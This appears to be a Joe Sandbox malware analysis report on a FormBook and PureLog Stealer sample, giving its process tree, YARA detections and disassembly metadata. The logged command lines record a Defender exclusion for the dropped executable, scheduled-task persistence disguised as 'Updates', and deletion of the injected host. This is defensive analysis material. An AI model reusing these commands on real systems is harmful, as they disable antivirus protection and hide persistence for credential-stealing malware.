Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp"
Imagebase:	0x720000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xfd0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:38:01
Start date:	14/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:38:02
Start date:	14/01/2025
Path:	C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe
Imagebase:	0x500000
File size:	680'448 bytes
MD5 hash:	AD5806FFE238EA11606D3EE49B28C655
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.1567368332.0000000002A77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:38:02
Start date:	14/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	10:38:06
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpA2.tmp"
Imagebase:	0x720000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:38:06
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:38:06
Start date:	14/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x5a0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:38:07
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mstsc.exe"
Imagebase:	0xf70000
File size:	1'264'640 bytes
MD5 hash:	EA4A02BE14C405327EEBA8D9AD2BD42C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	10:38:10
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:38:10
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:38:14
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\NETSTAT.EXE"
Imagebase:	0x4d0000
File size:	32'768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:39:35
Start date:	14/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4056 -s 6976
Imagebase:	0x7ff691d10000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:39:39
Start date:	14/01/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5%
Total number of Nodes:	60
Total number of Limit Nodes:	6

Executed Functions

Function 070175E8 Relevance: 6.9, Strings: 5, Instructions: 621
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 0701A5B4
Hq, xrefs: 0701A521
Hq, xrefs: 0701A6C5
Hq, xrefs: 0701A63B
Hq, xrefs: 0701A783

Memory Dump Source

Source File: 00000000.00000002.1509057105.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7010000_final shipping documents.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: ed76771e5bab5ce0a0095fff4183895ddef03503dd21f558442639dc178ea8e1
Instruction ID: c767a5dfc107520d211167ee07a2446bab8682fddbae717976fa5bceaefabe2c
Opcode Fuzzy Hash: ed76771e5bab5ce0a0095fff4183895ddef03503dd21f558442639dc178ea8e1
Instruction Fuzzy Hash: 503250B0B012188FEB54DFA9D8547AEBBF2AF85300F14C16AE409AB395DB349D45CF91

Function 07019F50 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509057105.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7010000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf774260f2d18c88b37e01e9c3714feb6f304e7c34456ec262dc2330bb605db
Instruction ID: 208a5c72f809928d3f16090a42c5e9b08b4f8aadf97332e472f40848b627b5de
Opcode Fuzzy Hash: ebf774260f2d18c88b37e01e9c3714feb6f304e7c34456ec262dc2330bb605db
Instruction Fuzzy Hash: 12C15BB0E012598FDF15CFA9C88079DBBF2AF89310F14C6AAE409AB255DB34D985CF51

Function 070063AD Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 737e38944ed6e6f39c9e7e25b170059efefebab86cabd50cda73de52e7d69a1d
Instruction ID: ddf2679fa1445193b5c498cccfcd9716c5f3b7aa5cf93e8f49175ae1bda350a8
Opcode Fuzzy Hash: 737e38944ed6e6f39c9e7e25b170059efefebab86cabd50cda73de52e7d69a1d
Instruction Fuzzy Hash: 1B21C5B1D046188BEB18CFABD94079EFAF3BF8A300F14D1AAD418A6255DB304A428F40

Function 00F9D551 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F9D5DE
GetCurrentThread.KERNEL32 ref: 00F9D61B
GetCurrentProcess.KERNEL32 ref: 00F9D658
GetCurrentThreadId.KERNEL32 ref: 00F9D6B1

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 25bee0ed89cb43e0b13f4226e3f3f234c15b6ec3ead28053c816b786f03f0e8e
Instruction ID: 4ddf87e73281fb41598b2a239d8e3a64b728cc41eedd47c2ff2c7ec3ae4ef5c7
Opcode Fuzzy Hash: 25bee0ed89cb43e0b13f4226e3f3f234c15b6ec3ead28053c816b786f03f0e8e
Instruction Fuzzy Hash: 675145B09013499FEB28CFAAD548BDEBBF1EF48314F248059E408AB391D7749984CF65

Function 00F9D560 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F9D5DE
GetCurrentThread.KERNEL32 ref: 00F9D61B
GetCurrentProcess.KERNEL32 ref: 00F9D658
GetCurrentThreadId.KERNEL32 ref: 00F9D6B1

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c81a9477707eb808d3f4e699efcb4a29f4c385e95596166ced17523768fd6bc9
Instruction ID: 4dbab26026949a25deb6d3e8ad137d7bf47385cc375575c9eedc198037a3d542
Opcode Fuzzy Hash: c81a9477707eb808d3f4e699efcb4a29f4c385e95596166ced17523768fd6bc9
Instruction Fuzzy Hash: 325135B09006099FEB28CFAAD548BDEBBF1EF48314F248459E009AB351D7749984CF65

Function 00F9B2B9 Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B51E

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 22f9150c6d89fb7dc56679373c6d8b9ab2d1f1bd1fccb42ac167213d3223f5c3
Instruction ID: 97bace74795966c65a33d722696addcbb46016a382eeb4380e20d92e40fc330a
Opcode Fuzzy Hash: 22f9150c6d89fb7dc56679373c6d8b9ab2d1f1bd1fccb42ac167213d3223f5c3
Instruction Fuzzy Hash: 53816670A00B058FEB24CF69E541B5ABBF1FF88314F108A2EE08AC7A40D775E805CB91

Function 00F95CEC Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F95DA9

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f4df57525643169d0cd80447475006e361931271f4d276033c741d475c03c193
Instruction ID: 40b5f7172544f11a24b6f3b9613e3dd2fd8a10ceecf5c6d60797b4238d7be037
Opcode Fuzzy Hash: f4df57525643169d0cd80447475006e361931271f4d276033c741d475c03c193
Instruction Fuzzy Hash: B641F271C04719CFEB25DFA9C844B8EBBF5BF49704F20806AD408AB255D7766946CF90

Function 00F94538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F95DA9

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f8ca441c9cfbd45ebe6b309d17b8abe18069c646155322ef61f0bb03497a1db6
Instruction ID: 3303b9d8f2cc2f85bf2df68d974c9bdf964d5446dc2a9ae7956692e145f98b4e
Opcode Fuzzy Hash: f8ca441c9cfbd45ebe6b309d17b8abe18069c646155322ef61f0bb03497a1db6
Instruction Fuzzy Hash: 7E41E171C04729CBEB24DFA9C844B8DBBB5BF48704F20805AD408AB255DB756945CF90

Function 0701A888 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1509057105.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7010000_final shipping documents.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 4d046df1357a96571fe2896490c3487d593758ab372604df7cbdf146de89ff73
Instruction ID: 70e668e6f87c63f47b8d649c41f88402b508ad69c4def75bc683cd1ceb13c6be
Opcode Fuzzy Hash: 4d046df1357a96571fe2896490c3487d593758ab372604df7cbdf146de89ff73
Instruction Fuzzy Hash: B6318BB2904389DFCB11DFA9C844ADEBFF8EF09310F14805AE954AB251C3359954DFA1

Function 0700F9D1 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0700FA56

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7994558b0dec7990a52b0b9d942be6b82b507d738753321ec2b5a33c626d3902
Instruction ID: 347a10ab586f3d554dff3109988221b724585b981ab0d435104626f7b49fa5c8
Opcode Fuzzy Hash: 7994558b0dec7990a52b0b9d942be6b82b507d738753321ec2b5a33c626d3902
Instruction Fuzzy Hash: 79216BB1D00349DFEB20CFA9C4457EEBBF4EF48224F14842DD459A7240C778A545CB95

Function 00F9D7A0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D82F

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 35a13426a6bf798f9b1e9ff7fe772a35648f7d2caf881ecb9c180f4cb37df542
Instruction ID: ef96ac1645c4d13cc25f15c1922b45da111778fa14af6eee23eb7ed76c5b4cd1
Opcode Fuzzy Hash: 35a13426a6bf798f9b1e9ff7fe772a35648f7d2caf881ecb9c180f4cb37df542
Instruction Fuzzy Hash: 3021F3B5C00248DFDB10CFAAD484ADEBBF4FB48310F14801AE918A7251D379A941CFA1

Function 0700F9D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0700FA56

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0d898ff916356c98aefda5ea1a748cf4a16822fffe69a100dcbd6480b8b05a66
Instruction ID: ef1d70a4ec0ecd473a95f50fb20f00ed4381cd75557e82dcdb51471df1e33269
Opcode Fuzzy Hash: 0d898ff916356c98aefda5ea1a748cf4a16822fffe69a100dcbd6480b8b05a66
Instruction Fuzzy Hash: A4213AB1D003098FDB14DFAAC4457EEBBF4EF48224F148429D459A7240CB78A545CFA5

Function 00F9D7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D82F

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7598c420b80d2adcb2e9ab0db6b3fb1bb801908bb9ac42ececb6326108f8d4b3
Instruction ID: e31f912ef78e73dadceda5305991152083e8c3c52905d1b5d46a316831ef452b
Opcode Fuzzy Hash: 7598c420b80d2adcb2e9ab0db6b3fb1bb801908bb9ac42ececb6326108f8d4b3
Instruction Fuzzy Hash: E621B3B5D00248DFDB10CF9AD584ADEBBF4FB48310F14841AE918A7351D379A944CFA5

Function 07017624 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0701A8A2,?,?,?,?,?), ref: 0701A947

Memory Dump Source

Source File: 00000000.00000002.1509057105.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7010000_final shipping documents.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: b1c33feffb2db1eb51ffe8e72528d60ea9cd1e33ab05a085eee2641e55a0a7a4
Instruction ID: dda453ef245d5ba3ed827fe4440ec1f75b9d2f0cc477d16771eeb415dca387ab
Opcode Fuzzy Hash: b1c33feffb2db1eb51ffe8e72528d60ea9cd1e33ab05a085eee2641e55a0a7a4
Instruction Fuzzy Hash: 64116AB5900349DFDB10CF9AC844BDEBFF8EB48310F14841AE514A7650C375A950CFA5

Function 0700F920 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0700F98A

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8f468ee511a9b6faa7543e3828ceedd3bfb33ce4bed6e29e32b93848d2054182
Instruction ID: 8fab15b7dd61f6b02cdeef42f2d38bd35785ce3394ab0d292af514bc74cb8d39
Opcode Fuzzy Hash: 8f468ee511a9b6faa7543e3828ceedd3bfb33ce4bed6e29e32b93848d2054182
Instruction Fuzzy Hash: 721146B1D003498FEB24DFAAC8447EEBBF5EF88224F248519D459A7680CA796940CB95

Function 0700F928 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0700F98A

Memory Dump Source

Source File: 00000000.00000002.1509008550.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_final shipping documents.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fc895cf05565a2dcdb30c4ae1f33d0c37f12dd934dc9b82db9383846db4d2f6e
Instruction ID: 3697f6b58f1bf320cd141142cc68c4d3e6f0ebc74e5b626d7e4031b163342bd0
Opcode Fuzzy Hash: fc895cf05565a2dcdb30c4ae1f33d0c37f12dd934dc9b82db9383846db4d2f6e
Instruction Fuzzy Hash: DC113AB1D003498FDB24DFAAC4457EEFBF4EF48224F148419D519A7640CB79A540CBA5

Function 00F9B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B51E

Memory Dump Source

Source File: 00000000.00000002.1503810968.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_final shipping documents.jbxd

Similarity

API ID: HandleModule
String ID:
